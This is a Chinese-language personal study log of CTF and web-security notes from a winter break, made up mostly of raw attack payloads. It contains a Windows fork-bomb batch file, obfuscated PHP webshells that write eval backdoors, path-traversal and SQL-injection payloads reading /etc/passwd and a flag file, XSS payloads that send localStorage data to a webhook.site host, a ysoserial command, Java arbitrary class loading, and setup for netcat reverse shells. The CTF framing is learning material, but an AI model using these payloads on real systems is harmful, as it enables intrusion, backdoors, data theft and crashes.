2022 寒假的一些学习记录

@echo off
%0 | %0 （windows循环批处理死机）

关于PHP不用数字和字母来制造webshell
P牛的一篇文章《一些不包含数字和字母的webshell》
一篇参考文章

第一个方法是取反：
PHP5
$_=~(%9E%8C%8C%9A%8D%8B);$__=~(%A0%AF%B0%AC%AB);$___=$$__;$_($___[_]);   //密码为_  
PHP7
(~(%99%96%93%9A%A0%8F%8A%8B%A0%9C%90%91%8B%9A%91%8B%8C))(~(%CB%D1%8F%97%8F),~(%C3%C0%8F%97%8F%DF%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%C4)); 
//file_out_contents('4.php','<?php eval($_POST[1]);');

第二个方法是异或：
PHP5
$_=('%40%5B%5B%40%5B%5B'^'%21%28%28%25%29%2F'); //assert
$__=('%40%40%40%40%40'^'%1F%10%0F%13%14'); //_POST
$__=$$__;  //$_POST
$_($__[_]); //assert($_POST[_])
PHP7
('%40%40%40%40%40%5B%5B%5B%40%40%40%40%5B%40%40%5B%5B'^'%26%29%2C%25%1F%2B.%2F%1F%23%2F.%2F%25.%2F%28')('%5B%00%5B%40%5B'^'%23.%2B%28%2B','%10%10%10%00%40%5B%40%40%00%00%40%40%40%40%40%40%10%40%00%10'^'%2C%2F-+%25-%21%2C%28%24%1F%10%0F%13%14%1B%21%1D%29%2B');
file_put_contents                                               x.php                        <?= eval($_POST[1]);

<?php
@eval(‘echo $_GET[x];’);
?>（可以执行系统命令）

（写入一句话文件）
<?php
fputs(fopen(“shell.php”,w),’<?php @eval($_GET[cmd]);?>’);
?>

data协议：
data://text/plain,<?php phpinfo();?>
data://text/plain,<?php echo 1;?>

nmap使用教程
namap扫描端口的一些用法：
nmap -sN -PE 192.168.1.0/24

RoarCTF的Easy Java
JavaWeb读取 WEB 配置文件 WEB-INF/web.xml
利用：filename=WEB-INF/classes/com/wm/ctf/FlagController.class
WEB-INF主要包含一下文件或目录:
/WEB-INF/web.xml：Web应用程序配置文件，描述了 servlet 和其他的应用组件配置及命名规则。
/WEB-INF/classes/：含了站点所有用的 class 文件，包括 servlet class 和非servlet class，他们不能包含在 .jar文件中
/WEB-INF/lib/：存放web应用需要的各种JAR文件，放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
/WEB-INF/src/：源码目录，按照包名结构放置各个java文件。
/WEB-INF/database.properties：数据库配置文件
漏洞检测以及利用方法：通过找到web.xml文件，推断class文件的路径，最后直接class文件，在通过反编译class文件，得到网站源码

2017百度的Zone
login=1
module=index&name=php
尝试了后发现过滤了…/所以需要构造…/./实现…/
module=…/./…/./…/./…/./etc/passwd&name
module=…/./…/./…/./…/./etc/nginx/nginx.conf&name
module=…/./…/./…/./…/./etc/nginx/sites-enabled/default&name
然后读到了 /online-movies可以进行目录穿越
直接访问/onlie-movies…/var/www/html/flag.php 就可以下载文件了

关于二次注入和报错注入的知识点（[CISCN2019 华北赛区 Day1 Web5]CyberPunk）

这个题目最关键代码
$address = addslashes($_POST["address"]);//过滤了单引号但是也会导致二次注入
$row = $fetch->fetch_assoc();
//下面的sql导致了二次注入，
$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
$result = $db->query($sql);
if(!$result) {
       echo 'error';
       print_r($db->error);
      exit;
}

[报错注入原理与语句学习](https://www.cnblogs.com/Triomphe/p/9489639.html)
payload：
user_name=6&phone=6&address=1'where `user_id`=updatexml(1,concat(0x7e,substr(load_file('/flag.txt'),1,25),0x7e),1)#
user_name=7&phone=7&address=1'where `user_id`=updatexml(1,concat(0x7e,substr(load_file('/flag.txt'),26,50),0x7e),1)#

xss技巧：

 ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi<img src=x onerror=&#X61;&#X6C;&#X65;&#X72;&#X74;(1)>
 
We continue by crafting a payload to extract the flag and send it back to our webhook：
<img src=x onerror=location.href='https://webhook.site/38689352-bda5-4841-80e3-4a48e1655deb?q='.toLowerCase()+localStorage.getItem('flag'.toLowerCase())>

After XML and URL encoding our input we send it to the admin bot as shown below:
ffiffiffiffiffiffiffiffiffiffiffi<img src=x onerror=&#X6c;&#X6f;&#X63;&#X61;&#X74;&#X69;&#X6f;&#X6e;.&#X68;&#X72;&#X65;&#X66;=&#X27;https://webhook.site/38689352-bda5-4841-80e3-4a48e1655deb?q=&#X27.&#X74;&#X6f;&#X4c;&#X6f;&#X77;&#X65;&#X72;&#X43;&#X61;&#X73;&#X65;()&#X2B;&#X6c;&#X6f;&#X63;&#X61;&#X6c;&#X53;&#X74;&#X6f;&#X72;&#X61;&#X67;&#X65;.&#X67;&#X65;&#X74;&#X49;&#X74;&#X65;&#X6d;(&#X27;flag&#X27;.&#X74;&#X6f;&#X4c;&#X6f;&#X77;&#X65;&#X72;&#X43;&#X61;&#X73;&#X65;())>

ysoserial的payload：
ysoserial下载链接

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS "http://pk3q64.dnslog.cn" > Test.txt 

VM2逃逸+原型链污染
一道经典例题：
dice-ctf-2022-vm-calc
原型链的学习：

JS 在创建对象（不论是普通对象还是函数对象）的时候，都有一个叫做__proto__ 的内置属性，用于指向创建它的构造函数的原型对象
有关于prototype和__proto__区别的学习：
prototype和__proto__
原型链污染学习

console.table([{ x : 1 }], [ "__proto__" ]);

关于JAVA

在java的环境下，netdoc协议也可以和file协议发挥同样的作用。
例子：
/file?url=file:///etc/passwd
/file?url=file:///etc/passwd
/file?url=netdoc:///usr/local/tomcat/webapps/ROOT/WEB-INF

URLClassLoader的任意类加载：

//        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("file:///C:\\Users\\Lenovo\\Desktop\\Java\\")});
//        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("http://127.0.0.1:9999/")});
        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("jar:file:///C:\\Users\\Lenovo\\Desktop\\Java\\Test.jar!/")});
        Class<?> hello = urlClassLoader.loadClass("Test");
        hello.newInstance();

		//getDeclaredMethod的反射动态调用，字节码加载任意类
		//  ClassLoader.defineClass
        Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
        defineClassMethod.setAccessible(true);
        byte[] code= Files.readAllBytes(Paths.get("C:\\Users\\Lenovo\\Desktop\\Java\\Test.class"));
        Class c= (Class) defineClassMethod.invoke(cl,"Test",code,0,code.length);
        c.newInstance();

        //getDeclareField的反射动态调用，字节码加载任意类
        //  Unsafe.defineClass
        Class c=Unsafe.class;
        Field theUnsafeField = c.getDeclaredField("theUnsafe");
        theUnsafeField.setAccessible(true);
        Unsafe unsafe= (Unsafe) theUnsafeField.get(null);
        byte[] code=Files.readAllBytes(Paths.get("C:\\Users\\Lenovo\\Desktop\\Java\\Test.class"));
        Class c1=(Class) unsafe.defineClass("Test",code,0,code.length,cl,null);
        c1.newInstance();

关于Ubuntu

Ubuntu自带的nc是无法反弹shell的，所以我们需要操作一下改成传统的nc
修改传统nc
安装传统nc：sudo apt -y install netcat-traditional
修改系统默认nc为传统nc，可用-e选项：sudo update-alternatives --config nc

一个不太懂的SSTI（原来是golang的
golang的ssti学习
golang的printf
学习如何运行一个go文件算是走了不少弯路，主要是每次下载依赖文件都不被墙。。。解决办法就是使用go mod，学习网址如下：
一文彻底搞懂go mod使用

{{printf "%+v" .}}（不太明白为啥这样搞！！！）
//如果值是一个结构体，%+v 的格式化输出内容将包括结构体的字段名。
    fmt.Printf("%+v\n", p) // {x:1 y:2}
查到了是golang的SSTI！！！

写在最后

寒假会持续更新的！